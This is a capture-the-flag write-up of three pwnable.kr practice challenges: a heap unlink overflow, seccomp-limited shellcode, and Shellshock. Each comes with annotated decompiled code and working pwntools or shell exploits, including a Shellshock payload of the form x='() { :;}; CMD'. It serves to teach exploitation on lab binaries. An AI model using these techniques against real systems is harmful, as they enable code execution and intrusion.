终于结束了考试,刷题模式再次开启T^T
先来一道简单的题目热下身
toddler unlink
description
Daddy! how can I exploit unlink corruption?
ssh unlink@pwnable.kr -p2222 (pw: guest)
What it does
❯ ./unlink
here is stack address leak: 0xffc28534
here is heap address leak: 0x82a0410
now that you have leaks, get shell!
a
Here we have a stack address, a heap address and an input
now the code
// Decompiled main() of the 'unlink' challenge (IDA output, 32-bit).
// It lays out three adjacent 0x10-byte chunks and links them like a doubly
// linked list (heap1 <-> heap2 <-> heap3), leaks one stack and one heap
// address, reads unbounded input into heap1 with gets(), then unlinks heap2.
int __cdecl main(int argc, const char **argv, const char **envp)
{
int *v3; // ST04_4 -- never assigned in this listing; decompiler artifact, see the unlink() call below
char *heap1; // [esp-14h] [ebp-14h] -- &heap1 == ebp-0x14; this is the leaked "stack address"
_DWORD *heap3; // [esp-10h] [ebp-10h]
_DWORD *heap2; // [esp-Ch] [ebp-Ch]
malloc(0x400u); // throw-away chunk; only moves the three small chunks away from the heap start
heap1 = (char *)malloc(0x10u);
heap2 = malloc(0x10u);
heap3 = malloc(0x10u);
// Build the list: word 0 of each chunk is the forward ("fd") pointer,
// word 1 the backward ("bk") pointer.
*(_DWORD *)heap1 = heap2;
heap2[1] = heap1;
*heap2 = heap3;
heap3[1] = heap2;
printf("here is stack address leak: %p\n", &heap1); // address of the local, i.e. ebp-0x14
printf("here is heap address leak: %p\n", heap1); // user data of the first chunk
puts("now that you have leaks, get shell!");
// VULN: gets() has no length bound. Per the heap dump, only 8 bytes of heap1
// remain after offset 8, so a longer line overwrites heap2's chunk header
// (prev_size/size) and then heap2's fd/bk words, which unlink() below reads
// and writes through -- an attacker-chosen write-what-where.
gets(heap1 + 8);
// Presumably unlink(heap2) in the original source; the second argument is an
// uninitialized register value the decompiler could not resolve.
unlink((int)heap2, v3);
return 0;
}
// Decompiled unlink(): the classic unchecked doubly-linked-list unlink.
// a2 is the node being removed (heap2 in main): a2[0] is its fd, a2[1] its bk.
// a1 is not referenced in the body (decompiler artifact of the call site).
// There is no "fd->bk == P && bk->fd == P" sanity check, so both pointers
// are trusted as-is; with gets()-controlled fd/bk this is an arbitrary write.
_DWORD *__cdecl unlink(int a1, int *a2)
{
_DWORD *v2; // ST10_4 -- bk
int v3; // ST0C_4 -- fd
_DWORD *result; // eax
v2 = (_DWORD *)a2[1]; // bk = P->bk
v3 = *a2; // fd = P->fd
// fd->bk = bk: stores the controlled value bk at address fd+4.
*(_DWORD *)(v3 + 4) = v2;
result = v2;
// bk->fd = fd: stores fd at address bk+0. Note this second store clobbers
// whatever sat at bk; in the exploit below bk = heap_leak+12, so the
// shell_addr copy at heap_leak+8 is the one that has to survive.
*v2 = v3;
return result;
}
嘛,这可以算做一个 unlink 的入门练习吧,模仿unlink 的操作
There are three chunks: heap1, whose data we can overflow through gets(); heap2, the chunk that unlink() will remove (its fd and bk are what the overflow reaches); and heap3, which is untouched.
So the goal is to rewrite heap2's fd and bk so that unlink()'s two stores (fd->bk = bk, bk->fd = fd) redirect control flow.
0x804b408: 0x00000000 0x00000019 0x0804b428 0x00000000
0x804b418: 0x00000000 0x00000000 0x00000000 0x00000019
0x804b428: 0x0804b440 0x0804b410 0x00000000 0x00000000
0x804b438: 0x00000000 0x00000019 0x00000000 0x0804b428
0x804b448: 0x00000000 0x00000000 0x00000000 0x00000409
heap1 -- heap2 -- heap3
The binary already contains a shell() function (shell_addr = 0x80484EB in the exploit below), so no shellcode is needed — the only job is to redirect control flow to it.
所以所需要做的就是控制执行流跳到 shell 函数即可
pwn step is as below
write(shell_addr*2) in heap1
write(p32(0)+p32(0x19)) over heap2's chunk header (prev_size / size) to keep the metadata exactly as it was in the heap dump and prevent a crash
write(stack_leak+0x10-0x4) to heap2's fd # stack_leak is &heap1 = ebp-0x14 (see the [ebp-14h] annotation), so fd+4 = stack_leak+0x10 = ebp-4 — not ebp itself but the slot main's epilogue uses to restore esp (confirm in the disassembly); unlink's first store (fd->bk = bk) lands there
write(heap_leak+8+4) to heap2's bk # heap_leak is the addr of heap1
after unlink
After unlink(), ebp-4 holds heap_leak+8+4 and main's epilogue derives esp from it, so the final `ret` pops one of the shell_addr copies we wrote at heap1+8. Note that unlink's second store (`*v2 = v3`, i.e. bk->fd = fd) overwrites the word at heap_leak+12 with fd, so only the copy at heap_leak+8 survives — that is why shell_addr is written twice.
After the ret executes you get a shell.
exp
from pwn import *
p = process("./unlink")


def pwn():
    """Parse the two leaks, forge heap2's fd/bk so unlink() redirects main's return, then hand over the shell."""
    # Both leaks are printed right after the literal "leak: " on their own line.
    p.recvuntil("leak: ")
    stack_leak = int(p.recvline().strip(), 16)   # &heap1, which is ebp-0x14 in main
    print(p.recvuntil("leak: "))
    heap_leak = int(p.recvline().strip(), 16)    # heap1's user data
    p.info("heap_leak:stack_leak " + hex(heap_leak) + ":" + hex(stack_leak))

    shell_addr = 0x80484EB               # shell() inside the binary
    fake_fd = stack_leak + 0x10 - 0x4    # fd+4 == stack_leak+0x10 (ebp-4): unlink writes bk there
    fake_bk = heap_leak + 8 + 4          # bk+0 is clobbered with fd; the word below it holds shell_addr

    payload = b"".join([
        p32(shell_addr) * 2,   # fills heap1[8:16]; two copies because unlink's second store overwrites one
        p32(0), p32(0x19),     # heap2 prev_size / size, reproduced unchanged from the heap dump
        p32(fake_fd),          # heap2->fd
        p32(fake_bk),          # heap2->bk
    ])
    p.sendline(payload)
    p.interactive()


pwn()
toddler asm
description
❯ ./asm ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode:
this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
It seems that we need to send a x64 shellcode to read the flag file with the seccomp sandbox
❯ seccomp-tools dump ./asm ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode: a
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x06 0x00 0x40000000 if (A >= 0x40000000) goto 0010
0004: 0x15 0x04 0x00 0x00000000 if (A == read) goto 0009
0005: 0x15 0x03 0x00 0x00000001 if (A == write) goto 0009
0006: 0x15 0x02 0x00 0x00000002 if (A == open) goto 0009
0007: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0009
0008: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
Only read, write, open, exit and exit_group are allowed (lines 0004–0008), and only for x86_64 syscall numbers below 0x40000000 (lines 0001 and 0003 reject other architectures and the x32 ABI bit); anything else returns KILL. So exit() is available for a clean finish even though the banner only mentions open/read/write.
and the code
// Decompiled main() of the 'asm' challenge: maps an RWX page at a fixed
// address, copies a stub into it, appends the user's shellcode, then
// chroots, installs the seccomp filter and jumps to the page.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char *s; // ST18_8 -- the executable page
size_t v4; // rdx -- strlen(stub)
setvbuf(stdout, 0LL, 2, 0LL); // 2 == _IONBF: unbuffered stdout
setvbuf(stdin, 0LL, 1, 0LL); // 1 == _IOLBF: line-buffered stdin
puts("Welcome to shellcoding practice challenge.");
puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
puts("If this does not challenge you. you should play 'asg' challenge :)");
// prot 7 = PROT_READ|PROT_WRITE|PROT_EXEC, flags 0x32 = MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,
// so the page always lands at 0x41414000 (no ASLR for it). Return value is not checked.
s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
memset(s, 144, 0x1000uLL); // 0x90 == NOP: the whole page is a NOP sled
v4 = strlen(stub); // stub is defined elsewhere; presumably 46 bytes, given the read offset below
memcpy(s, stub, v4);
printf("give me your x64 shellcode: ", stub, argv); // the extra arguments are a decompiler artifact
// Up to 1000 raw bytes of shellcode placed right behind the stub; no NUL is
// required and nothing after the user bytes but NOPs, so shellcode that does
// not exit() slides into the sled and off the page.
read(0, s + 46, 0x3E8uLL);
alarm(0xAu); // 10 s budget for the whole run
// chroot() with no chdir(): the process's cwd is NOT moved into the jail, so a
// relative open() in the shellcode resolves against the original cwd
// (presumably the flag directory -- TODO confirm), while an absolute path
// resolves inside the new root.
chroot("/home/asm_pwn");
sandbox(); // installs the seccomp filter dumped above
((void (__fastcall *)(const char *))s)("/home/asm_pwn"); // jump to stub+shellcode; first argument arrives in rdi
return 0;
}
Okay, it is clear now.
The file name is readable in /home/asm, but the real flag lives in /home/asm_pwn, which the chroot()'d binary is the only way to reach. Note that chroot() is not followed by chdir(), so the process's cwd stays wherever the service started it; the relative path used in the exploit below resolves against that cwd, whereas "/<name>" would resolve inside the new root.
Now, the exp using pwntools
#!/usr/bin/env python
#coding:utf-8
from pwn import *
import time
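con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
context.arch = 'amd64'

# Name of the flag file (listed in /home/asm; the file itself is in the chroot).
FLAG_NAME = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

# Only the syscalls the seccomp filter permits are used: open/read/write plus exit.
shellcode = ''
shellcode += shellcraft.pushstr(FLAG_NAME)       # NUL-terminated name at rsp
shellcode += shellcraft.open('rsp', 0, 0)        # O_RDONLY; fd comes back in rax
shellcode += shellcraft.read('rax', 'rsp', 100)  # reuse the name's stack space; rax = bytes read
# Write exactly the bytes read instead of a fixed 100: the original printed the
# leftover filename bytes after a short flag.
shellcode += shellcraft.write(1, 'rsp', 'rax')
# Terminate cleanly instead of sliding into the NOP-filled page; exit is allowed
# by the filter (line 0007 of the dump).
shellcode += shellcraft.exit(0)

print(p.recvuntil("shellcode:"))
p.send(asm(shellcode))
# exit(0) closes the connection, so recvall() returns everything up to EOF.
print(p.recvall())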
toddler shellsock
description
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)
ssh shellshock@pwnable.kr -p2222 (pw:guest)
Well, you need to know the shellshock Vulnerability first.
http://www.freebuf.com/articles/system/45390.html
https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin
You have two file
bash shellshock
shellshock
// Decompiled main() of the 'shellshock' challenge: a privilege-switching
// wrapper that runs a fixed command through the bundled bash.
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t v3; // er12
__gid_t v4; // ebx
__gid_t v5; // eax
__gid_t v6; // er12
__gid_t v7; // ebx
__gid_t v8; // eax
// Note: all three uid values come from getegid(), not geteuid(), so the
// process ends up with real/effective/saved uid == the numeric value of its
// effective gid. Reads like a slip in the original source; confirm against
// the binary. Return values of setresuid/setresgid are not checked.
v3 = getegid();
v4 = getegid();
v5 = getegid();
setresuid(v5, v4, v3);
v6 = getegid();
v7 = getegid();
v8 = getegid();
setresgid(v8, v7, v6);
// system() runs the command via "sh -c", which execs the bundled bash with
// this process's environment intact. Every exported variable is handed to
// that bash; a value of the form "() { :;}; CMD" is parsed as a function
// definition and CMD is executed (Shellshock, CVE-2014-6271) with the ids
// set above. The command string itself is fixed; the environment is the input.
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
shellshock runs the bundled bash binary through system(), and the environment is inherited unchanged.
The vulnerable bash parses every exported variable whose value begins with `() {` as a function definition and keeps executing whatever follows the body — so an exported variable becomes a command injection that runs with the uid/gid set by setresuid/setresgid.
exp
# The value of x is a bash function definition followed by an extra command.
# The vulnerable bash spawned by system() imports x from the environment and
# runs the trailing `/bin/cat flag` with the ids the wrapper set.
x='() { :;}; /bin/cat flag' ./shellshock
memcpy